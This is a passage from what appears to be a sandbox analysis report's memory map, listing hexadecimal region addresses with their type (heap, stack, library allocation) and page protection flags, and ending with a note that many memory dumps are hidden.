page read and write
|
||
1E57F929000
|
heap
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
7FF848FDC000
|
trusted library allocation
|
page read and write
|
||
1E5850F6000
|
heap
|
page read and write
|
||
22721CD9000
|
heap
|
page read and write
|
||
7FF8490B5000
|
trusted library allocation
|
page read and write
|
||
22265355000
|
heap
|
page read and write
|
||
4150000
|
trusted library allocation
|
page read and write
|
||
1460000
|
heap
|
page read and write
|
||
3950000
|
trusted library allocation
|
page read and write
|
||
1E580000000
|
heap
|
page read and write
|
||
22265AD7000
|
heap
|
page read and write
|
||
389A000
|
trusted library allocation
|
page read and write
|
||
1505000
|
heap
|
page read and write
|
||
132F1000
|
trusted library allocation
|
page read and write
|
||
1563000
|
heap
|
page read and write
|
||
8F0000
|
trusted library section
|
page read and write
|
||
1BC56000
|
heap
|
page read and write
|
||
10E0000
|
heap
|
page execute and read and write
|
||
22265AB1000
|
heap
|
page read and write
|
||
8584C7E000
|
stack
|
page read and write
|
||
1843000
|
heap
|
page read and write
|
||
1E5850FB000
|
heap
|
page read and write
|
||
7FF849015000
|
trusted library allocation
|
page read and write
|
||
22265B0E000
|
heap
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page execute and read and write
|
||
700000
|
heap
|
page read and write
|
||
1BE48000
|
heap
|
page read and write
|
||
1BBE1000
|
heap
|
page read and write
|
||
3920000
|
trusted library allocation
|
page read and write
|
||
22265359000
|
heap
|
page read and write
|
||
22264B1B000
|
heap
|
page read and write
|
||
1C5CB000000
|
heap
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
22265AA4000
|
heap
|
page read and write
|
||
1E584E30000
|
trusted library allocation
|
page read and write
|
||
1BCAE000
|
stack
|
page read and write
|
||
14A0000
|
heap
|
page read and write
|
||
AFE000
|
stack
|
page read and write
|
||
1404B013000
|
heap
|
page read and write
|
||
22265359000
|
heap
|
page read and write
|
||
492B000
|
stack
|
page read and write
|
||
22706080000
|
trusted library allocation
|
page read and write
|
||
4A90000
|
heap
|
page execute and read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
1B211000
|
heap
|
page read and write
|
||
1C8D0000
|
heap
|
page read and write
|
||
22265357000
|
heap
|
page read and write
|
||
22265AD7000
|
heap
|
page read and write
|
||
22264A13000
|
heap
|
page read and write
|
||
1BE13000
|
heap
|
page read and write
|
||
1E580015000
|
heap
|
page read and write
|
||
22265ADA000
|
heap
|
page read and write
|
||
22707A50000
|
heap
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
22265ABF000
|
heap
|
page read and write
|
||
585DDF4000
|
stack
|
page read and write
|
||
22707EC3000
|
trusted library allocation
|
page read and write
|
||
12FC000
|
heap
|
page read and write
|
||
22265AE1000
|
heap
|
page read and write
|
||
1404AE50000
|
heap
|
page read and write
|
||
22705FF0000
|
heap
|
page read and write
|
||
3910000
|
trusted library allocation
|
page execute and read and write
|
||
980000
|
heap
|
page read and write
|
||
22265330000
|
heap
|
page read and write
|
||
1C5CB113000
|
heap
|
page read and write
|
||
22721B9A000
|
heap
|
page read and write
|
||
9D0000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
585E5FE000
|
stack
|
page read and write
|
||
22707A20000
|
heap
|
page read and write
|
||
1BBC0000
|
heap
|
page read and write
|
||
22264ADF000
|
heap
|
page read and write
|
||
7FF848F91000
|
trusted library allocation
|
page read and write
|
||
BD4000
|
unkown
|
page write copy
|
||
278D000
|
trusted library allocation
|
page read and write
|
||
22264A8A000
|
heap
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
1E57F8B3000
|
heap
|
page read and write
|
||
85841FB000
|
stack
|
page read and write
|
||
22265B2B000
|
heap
|
page read and write
|
||
22265354000
|
heap
|
page read and write
|
||
46DE000
|
stack
|
page read and write
|
||
FF0000
|
unkown
|
page readonly
|
||
227082BC000
|
trusted library allocation
|
page read and write
|
||
22264A8F000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
3710000
|
trusted library allocation
|
page read and write
|
||
585E6FE000
|
stack
|
page read and write
|
||
22265331000
|
heap
|
page read and write
|
||
3762000
|
trusted library allocation
|
page read and write
|
||
8583CFE000
|
unkown
|
page readonly
|
||
22707CF1000
|
trusted library allocation
|
page read and write
|
||
22720770000
|
heap
|
page read and write
|
||
1BC6C000
|
heap
|
page read and write
|
||
1E585114000
|
heap
|
page read and write
|
||
1C5CAB60000
|
heap
|
page read and write
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
22265AD7000
|
heap
|
page read and write
|
||
1C25E000
|
stack
|
page read and write
|
||
22265393000
|
heap
|
page read and write
|
||
7FF8491D0000
|
trusted library allocation
|
page read and write
|
||
22265AD3000
|
heap
|
page read and write
|
||
1BD30000
|
heap
|
page read and write
|
||
22721B6C000
|
heap
|
page read and write
|
||
22707F54000
|
trusted library allocation
|
page read and write
|
||
14ED000
|
heap
|
page read and write
|
||
1E584DD0000
|
trusted library allocation
|
page read and write
|
||
227082DC000
|
trusted library allocation
|
page read and write
|
||
1404B802000
|
trusted library allocation
|
page read and write
|
||
8DC000
|
stack
|
page read and write
|
||
1C7C7000
|
heap
|
page read and write
|
||
1C03F000
|
stack
|
page read and write
|
||
22721B6F000
|
heap
|
page read and write
|
||
1C5CB113000
|
heap
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
11C4000
|
stack
|
page read and write
|
||
22265359000
|
heap
|
page read and write
|
||
8583DFA000
|
stack
|
page read and write
|
||
1E57F7E0000
|
trusted library allocation
|
page read and write
|
||
1940000
|
heap
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
1BE90000
|
heap
|
page read and write
|
||
1B18F000
|
heap
|
page read and write
|
||
22723FAE000
|
heap
|
page read and write
|
||
1E586000000
|
heap
|
page read and write
|
||
5170000
|
trusted library allocation
|
page read and write
|
||
22264A00000
|
heap
|
page read and write
|
||
304F000
|
stack
|
page read and write
|
||
227240A0000
|
heap
|
page read and write
|
||
73E000
|
stack
|
page read and write
|
||
1B20D000
|
heap
|
page read and write
|
||
22721998000
|
heap
|
page read and write
|
||
1E584F00000
|
remote allocation
|
page read and write
|
||
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
78D000
|
heap
|
page read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
5550000
|
trusted library allocation
|
page execute and read and write
|
||
22265359000
|
heap
|
page read and write
|
||
7FF848E23000
|
trusted library allocation
|
page read and write
|
||
7FF8491A5000
|
trusted library allocation
|
page read and write
|
||
1E580CD0000
|
trusted library allocation
|
page read and write
|
||
907000
|
heap
|
page read and write
|
||
7FF8492E0000
|
trusted library allocation
|
page execute and read and write
|
||
1E584E40000
|
trusted library allocation
|
page read and write
|
||
1BC96000
|
heap
|
page read and write
|
||
22721B7B000
|
heap
|
page read and write
|
||
4F38000
|
heap
|
page read and write
|
||
1BE3E000
|
stack
|
page read and write
|
||
1E585054000
|
heap
|
page read and write
|
||
2F4F000
|
stack
|
page read and write
|
||
123FE000
|
trusted library allocation
|
page read and write
|
||
37B0000
|
trusted library allocation
|
page read and write
|
||
1E585100000
|
heap
|
page read and write
|
||
7FF849250000
|
trusted library allocation
|
page execute and read and write
|
||
1944000
|
heap
|
page read and write
|
||
2226532B000
|
heap
|
page read and write
|
||
22265B1B000
|
heap
|
page read and write
|
||
1337000
|
heap
|
page read and write
|
||
1C5CB100000
|
heap
|
page read and write
|
||
843000
|
unkown
|
page readonly
|
||
2226532D000
|
heap
|
page read and write
|
||
132FD000
|
trusted library allocation
|
page read and write
|
||
1BBDD000
|
heap
|
page read and write
|
||
24AF000
|
trusted library allocation
|
page read and write
|
||
1C5CAD24000
|
heap
|
page read and write
|
||
22265380000
|
heap
|
page read and write
|
||
227060D5000
|
heap
|
page read and write
|
||
1A4E000
|
stack
|
page read and write
|
||
1589000
|
heap
|
page read and write
|
||
4E2D000
|
stack
|
page read and write
|
||
22265357000
|
heap
|
page read and write
|
||
1339000
|
heap
|
page read and write
|
||
227207C2000
|
heap
|
page read and write
|
||
23E0000
|
heap
|
page read and write
|
||
22721C1D000
|
heap
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
22265313000
|
heap
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
22265A84000
|
heap
|
page read and write
|
||
22265337000
|
heap
|
page read and write
|
||
1A72D7E000
|
unkown
|
page readonly
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
22707CF5000
|
trusted library allocation
|
page read and write
|
||
132FF000
|
trusted library allocation
|
page read and write
|
||
1E584CE0000
|
trusted library allocation
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
7FF8492D0000
|
trusted library allocation
|
page read and write
|
||
22265380000
|
heap
|
page read and write
|
||
2272079E000
|
heap
|
page read and write
|
||
1E584F00000
|
remote allocation
|
page read and write
|
||
22720542000
|
heap
|
page read and write
|
||
22707C20000
|
heap
|
page read and write
|
||
1C5CAC37000
|
heap
|
page read and write
|
||
4FD000
|
stack
|
page read and write
|
||
9F0000
|
heap
|
page read and write
|
||
22264B4D000
|
heap
|
page read and write
|
||
22707F4C000
|
trusted library allocation
|
page read and write
|
||
7FF84900B000
|
trusted library allocation
|
page read and write
|
||
BD4000
|
unkown
|
page read and write
|
||
1B1F7000
|
heap
|
page read and write
|
||
2226535D000
|
heap
|
page read and write
|
||
2226537A000
|
heap
|
page read and write
|
||
7FF849147000
|
trusted library allocation
|
page read and write
|
||
1E584EB0000
|
trusted library allocation
|
page read and write
|
||
8584A7E000
|
stack
|
page read and write
|
||
3720000
|
trusted library allocation
|
page read and write
|
||
585E0FE000
|
stack
|
page read and write
|
||
32E0000
|
heap
|
page execute and read and write
|
||
11EE000
|
stack
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
2226535C000
|
heap
|
page read and write
|
||
585E2FD000
|
stack
|
page read and write
|
||
1B758000
|
stack
|
page read and write
|
||
1A7277E000
|
unkown
|
page readonly
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
668C2FE000
|
stack
|
page read and write
|
||
787000
|
heap
|
page read and write
|
||
7FF848FDF000
|
trusted library allocation
|
page read and write
|
||
9DE000
|
stack
|
page read and write
|
||
81C000
|
stack
|
page read and write
|
||
1E584F00000
|
remote allocation
|
page read and write
|
||
7FF8492C0000
|
trusted library allocation
|
page read and write
|
||
1C5CAB70000
|
trusted library allocation
|
page read and write
|
||
1C7AD000
|
stack
|
page read and write
|
||
22265352000
|
heap
|
page read and write
|
||
2226535B000
|
heap
|
page read and write
|
||
7FF8490B9000
|
trusted library allocation
|
page read and write
|
||
22720794000
|
heap
|
page read and write
|
||
2652000
|
trusted library allocation
|
page read and write
|
||
4A30000
|
trusted library allocation
|
page read and write
|
||
1378000
|
heap
|
page read and write
|
||
15A8000
|
trusted library allocation
|
page read and write
|
||
22707E58000
|
trusted library allocation
|
page read and write
|
||
22265330000
|
heap
|
page read and write
|
||
22264AA7000
|
heap
|
page read and write
|
||
12F0000
|
heap
|
page read and write
|
||
1404AE30000
|
heap
|
page read and write
|
||
1B270000
|
trusted library allocation
|
page read and write
|
||
22721BF5000
|
heap
|
page read and write
|
||
14A9000
|
heap
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
7FF849196000
|
trusted library allocation
|
page read and write
|
||
85840FE000
|
unkown
|
page readonly
|
||
1840000
|
heap
|
page read and write
|
||
22265AF8000
|
heap
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
71B000
|
stack
|
page read and write
|
||
22707C61000
|
trusted library allocation
|
page read and write
|
||
22708442000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
22265376000
|
heap
|
page read and write
|
||
3880000
|
trusted library allocation
|
page read and write
|
||
22264A99000
|
heap
|
page read and write
|
||
1E57F7F0000
|
trusted library section
|
page read and write
|
||
B7E000
|
stack
|
page read and write
|
||
B67000
|
trusted library allocation
|
page execute and read and write
|
||
22265384000
|
heap
|
page read and write
|
||
7FF848E34000
|
trusted library allocation
|
page read and write
|
||
1B856000
|
stack
|
page read and write
|
||
22265354000
|
heap
|
page read and write
|
||
22265AE1000
|
heap
|
page read and write
|
||
22707E5A000
|
trusted library allocation
|
page read and write
|
||
1BBEE000
|
heap
|
page read and write
|
||
1E57F890000
|
heap
|
page read and write
|
||
B33000
|
trusted library allocation
|
page execute and read and write
|
||
22265332000
|
heap
|
page read and write
|
||
140E000
|
trusted library allocation
|
page read and write
|
||
1850000
|
unkown
|
page readonly
|
||
1B1B9000
|
heap
|
page read and write
|
||
1E57F87B000
|
heap
|
page read and write
|
||
1E584E90000
|
trusted library allocation
|
page read and write
|
||
9E0000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
3130000
|
heap
|
page execute and read and write
|
||
22264AB2000
|
heap
|
page read and write
|
||
585D9FE000
|
stack
|
page read and write
|
||
22265AC3000
|
heap
|
page read and write
|
||
227060D0000
|
heap
|
page read and write
|
||
22708195000
|
trusted library allocation
|
page read and write
|
||
22265380000
|
heap
|
page read and write
|
||
7FF848E7C000
|
trusted library allocation
|
page execute and read and write
|
||
22265382000
|
heap
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
3795000
|
trusted library allocation
|
page read and write
|
||
2226535D000
|
heap
|
page read and write
|
||
22721BDC000
|
heap
|
page read and write
|
||
1A7297E000
|
unkown
|
page readonly
|
||
22264B3C000
|
heap
|
page read and write
|
||
1A7267D000
|
stack
|
page read and write
|
||
12B0000
|
heap
|
page read and write
|
||
585E3FD000
|
stack
|
page read and write
|
||
1B280000
|
trusted library allocation
|
page read and write
|
||
227207C4000
|
heap
|
page read and write
|
||
B6B000
|
trusted library allocation
|
page execute and read and write
|
||
22720763000
|
heap
|
page read and write
|
||
22264970000
|
heap
|
page read and write
|
||
158C000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
22265B2C000
|
heap
|
page read and write
|
||
410D000
|
stack
|
page read and write
|
||
22265AE0000
|
heap
|
page read and write
|
||
22265AD7000
|
heap
|
page read and write
|
||
2270838D000
|
trusted library allocation
|
page read and write
|
||
AD5000
|
heap
|
page read and write
|
||
22265329000
|
heap
|
page read and write
|
||
4CEB000
|
stack
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
9C0000
|
trusted library allocation
|
page read and write
|
||
1910000
|
heap
|
page read and write
|
||
22265A36000
|
heap
|
page read and write
|
||
60E000
|
heap
|
page read and write
|
||
1E5850BE000
|
heap
|
page read and write
|
||
FBE000
|
stack
|
page read and write
|
||
7FF848FAE000
|
trusted library allocation
|
page read and write
|
||
183F000
|
stack
|
page read and write
|
||
22265B20000
|
heap
|
page read and write
|
||
22708459000
|
trusted library allocation
|
page read and write
|
||
22265AD7000
|
heap
|
page read and write
|
||
FF2000
|
unkown
|
page readonly
|
||
1C5CB102000
|
heap
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FD9000
|
trusted library allocation
|
page read and write
|
||
7FF848E33000
|
trusted library allocation
|
page read and write
|
||
1AF4F000
|
stack
|
page read and write
|
||
1594000
|
trusted library allocation
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
1A97D000
|
stack
|
page read and write
|
||
414D000
|
stack
|
page read and write
|
||
1E57F8AE000
|
heap
|
page read and write
|
||
4F30000
|
heap
|
page read and write
|
||
2226535A000
|
heap
|
page read and write
|
||
668BAFC000
|
stack
|
page read and write
|
||
B56000
|
trusted library allocation
|
page execute and read and write
|
||
22265374000
|
heap
|
page read and write
|
||
22265A67000
|
heap
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
1E57F843000
|
heap
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
22721C03000
|
heap
|
page read and write
|
||
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
22721CD1000
|
heap
|
page read and write
|
||
13A4000
|
heap
|
page read and write
|
||
22265375000
|
heap
|
page read and write
|
||
22265357000
|
heap
|
page read and write
|
||
2226537D000
|
heap
|
page read and write
|
||
649000
|
heap
|
page read and write
|
||
22265375000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
2226535F000
|
heap
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
3890000
|
trusted library allocation
|
page read and write
|
||
22265300000
|
heap
|
page read and write
|
||
22265359000
|
heap
|
page read and write
|
||
1630000
|
heap
|
page read and write
|
||
7FF848FE6000
|
trusted library allocation
|
page read and write
|
||
2226535A000
|
heap
|
page read and write
|
||
22265B2B000
|
heap
|
page read and write
|
||
3766000
|
trusted library allocation
|
page read and write
|
||
22721C6C000
|
heap
|
page read and write
|
||
22708028000
|
trusted library allocation
|
page read and write
|
||
7FF848E44000
|
trusted library allocation
|
page read and write
|
||
22265880000
|
remote allocation
|
page read and write
|
||
24C0000
|
unkown
|
page readonly
|
||
8583BFE000
|
stack
|
page read and write
|
||
12428000
|
trusted library allocation
|
page read and write
|
||
1A72B7E000
|
unkown
|
page readonly
|
||
7FF405150000
|
trusted library allocation
|
page execute and read and write
|
||
22265ADD000
|
heap
|
page read and write
|
||
1A72C7C000
|
stack
|
page read and write
|
||
22265AA0000
|
heap
|
page read and write
|
||
22707F3F000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
22705F4B000
|
heap
|
page read and write
|
||
22265376000
|
heap
|
page read and write
|
||
3160000
|
heap
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
22265352000
|
heap
|
page read and write
|
||
39B0000
|
unkown
|
page readonly
|
||
17E0000
|
heap
|
page execute and read and write
|
||
1280000
|
trusted library allocation
|
page read and write
|
||
1E580100000
|
heap
|
page read and write
|
||
7FF848EE0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
4AAE000
|
stack
|
page read and write
|
||
7FF848E3D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
858367B000
|
stack
|
page read and write
|
||
585E1FE000
|
stack
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
6E0000
|
heap
|
page read and write
|
||
7FF848F99000
|
trusted library allocation
|
page read and write
|
||
22264A5E000
|
heap
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
22721CC9000
|
heap
|
page read and write
|
||
7FF848FD5000
|
trusted library allocation
|
page read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
AC3000
|
heap
|
page execute and read and write
|
||
32CE000
|
stack
|
page read and write
|
||
7FF849054000
|
trusted library allocation
|
page read and write
|
||
B60000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
1E57F872000
|
heap
|
page read and write
|
||
1B1FE000
|
heap
|
page read and write
|
||
B02000
|
trusted library allocation
|
page read and write
|
||
7FF849006000
|
trusted library allocation
|
page read and write
|
||
1E58501F000
|
heap
|
page read and write
|
||
22265A03000
|
heap
|
page read and write
|
||
1BB4D000
|
stack
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
3FA0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849240000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
1E580113000
|
heap
|
page read and write
|
||
14B5000
|
heap
|
page read and write
|
||
22265378000
|
heap
|
page read and write
|
||
22265A97000
|
heap
|
page read and write
|
||
22265378000
|
heap
|
page read and write
|
||
227207CA000
|
heap
|
page read and write
|
||
7FF8491B3000
|
trusted library allocation
|
page read and write
|
||
7FF849047000
|
trusted library allocation
|
page read and write
|
||
668C8FE000
|
unkown
|
page readonly
|
||
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
227240BD000
|
heap
|
page read and write
|
||
BBE000
|
stack
|
page read and write
|
||
7FF8491B0000
|
trusted library allocation
|
page read and write
|
||
157A000
|
heap
|
page read and write
|
||
14A0000
|
heap
|
page read and write
|
||
22723FA6000
|
heap
|
page read and write
|
||
22265356000
|
heap
|
page read and write
|
||
22265A66000
|
heap
|
page read and write
|
||
33A7000
|
trusted library allocation
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
3937000
|
trusted library allocation
|
page read and write
|
||
227081B8000
|
trusted library allocation
|
page read and write
|
||
1E57F913000
|
heap
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
1404B102000
|
heap
|
page read and write
|
||
22707C50000
|
heap
|
page execute and read and write
|
||
22264AAD000
|
heap
|
page read and write
|
||
3FC0000
|
trusted library allocation
|
page read and write
|
||
4A6C000
|
stack
|
page read and write
|
||
A07000
|
heap
|
page read and write
|
||
22265357000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
22264990000
|
heap
|
page read and write
|
||
10C0000
|
heap
|
page execute and read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
3541000
|
trusted library allocation
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
22721B41000
|
heap
|
page read and write
|
||
C7E000
|
stack
|
page read and write
|
||
7FF8491E0000
|
trusted library allocation
|
page read and write
|
||
2226533B000
|
heap
|
page read and write
|
||
EBE000
|
stack
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
3FF0000
|
trusted library allocation
|
page execute and read and write
|
||
12A0000
|
trusted library allocation
|
page read and write
|
||
4170000
|
trusted library allocation
|
page read and write
|
||
22724041000
|
heap
|
page read and write
|
||
63A000
|
heap
|
page read and write
|
||
85839F7000
|
stack
|
page read and write
|
||
22264B3B000
|
heap
|
page read and write
|
||
1BBAE000
|
stack
|
page read and write
|
||
1404B02B000
|
heap
|
page read and write
|
||
22264AA7000
|
heap
|
page read and write
|
||
1404AF60000
|
trusted library allocation
|
page read and write
|
||
83B000
|
unkown
|
page readonly
|
||
585D113000
|
stack
|
page read and write
|
||
22265A69000
|
heap
|
page read and write
|
||
158A000
|
trusted library allocation
|
page read and write
|
||
1E58011B000
|
heap
|
page read and write
|
||
95E000
|
stack
|
page read and write
|
||
12E3000
|
trusted library allocation
|
page read and write
|
||
668C1FE000
|
unkown
|
page readonly
|
||
1E584D60000
|
trusted library allocation
|
page read and write
|
||
22265A89000
|
heap
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
227084B4000
|
trusted library allocation
|
page read and write
|
||
32F1000
|
trusted library allocation
|
page read and write
|
||
227082C5000
|
trusted library allocation
|
page read and write
|
||
858457E000
|
stack
|
page read and write
|
||
668BCF8000
|
stack
|
page read and write
|
||
7FF8491D0000
|
trusted library allocation
|
page read and write
|
||
3290000
|
heap
|
page execute and read and write
|
||
1846000
|
heap
|
page read and write
|
||
CCE000
|
heap
|
page read and write
|
||
668B9FE000
|
unkown
|
page readonly
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
668B97E000
|
stack
|
page read and write
|
||
22265393000
|
heap
|
page read and write
|
||
123FC000
|
trusted library allocation
|
page read and write
|
||
4B32000
|
unkown
|
page readonly
|
||
22265382000
|
heap
|
page read and write
|
||
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
89E000
|
stack
|
page read and write
|
||
22723FC2000
|
heap
|
page read and write
|
||
1404B038000
|
heap
|
page read and write
|
||
1410000
|
trusted library allocation
|
page read and write
|
||
900000
|
heap
|
page read and write
|
||
8584BFE000
|
unkown
|
page readonly
|
||
227082D8000
|
trusted library allocation
|
page read and write
|
||
227082C8000
|
trusted library allocation
|
page read and write
|
||
22265AB6000
|
heap
|
page read and write
|
||
8584AFE000
|
unkown
|
page readonly
|
||
227207AF000
|
heap
|
page read and write
|
||
22265A69000
|
heap
|
page read and write
|
||
12F6000
|
heap
|
page read and write
|
||
22265202000
|
heap
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
4BAC000
|
stack
|
page read and write
|
||
85850FE000
|
unkown
|
page readonly
|
||
22265330000
|
heap
|
page read and write
|
||
37B1000
|
trusted library allocation
|
page read and write
|
||
22717CC9000
|
trusted library allocation
|
page read and write
|
||
668C4FC000
|
stack
|
page read and write
|
||
4B30000
|
unkown
|
page readonly
|
||
7FF848F95000
|
trusted library allocation
|
page read and write
|
||
7FF849044000
|
trusted library allocation
|
page read and write
|
||
22721BA4000
|
heap
|
page read and write
|
||
22720750000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
3A10000
|
trusted library allocation
|
page read and write
|
||
5540000
|
heap
|
page read and write
|
||
22721BBE000
|
heap
|
page read and write
|
||
585DAF8000
|
stack
|
page read and write
|
||
7FF8490B1000
|
trusted library allocation
|
page read and write
|
||
780000
|
trusted library allocation
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
22265379000
|
heap
|
page read and write
|
||
326D000
|
stack
|
page read and write
|
||
668B8FE000
|
unkown
|
page readonly
|
||
22265AFA000
|
heap
|
page read and write
|
||
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
858477E000
|
stack
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
157E000
|
trusted library allocation
|
page read and write
|
||
585DBFD000
|
stack
|
page read and write
|
||
37A9000
|
trusted library allocation
|
page read and write
|
||
1BE69000
|
heap
|
page read and write
|
||
B00000
|
trusted library allocation
|
page read and write
|
There are 1298 hidden memdumps, click here to show them.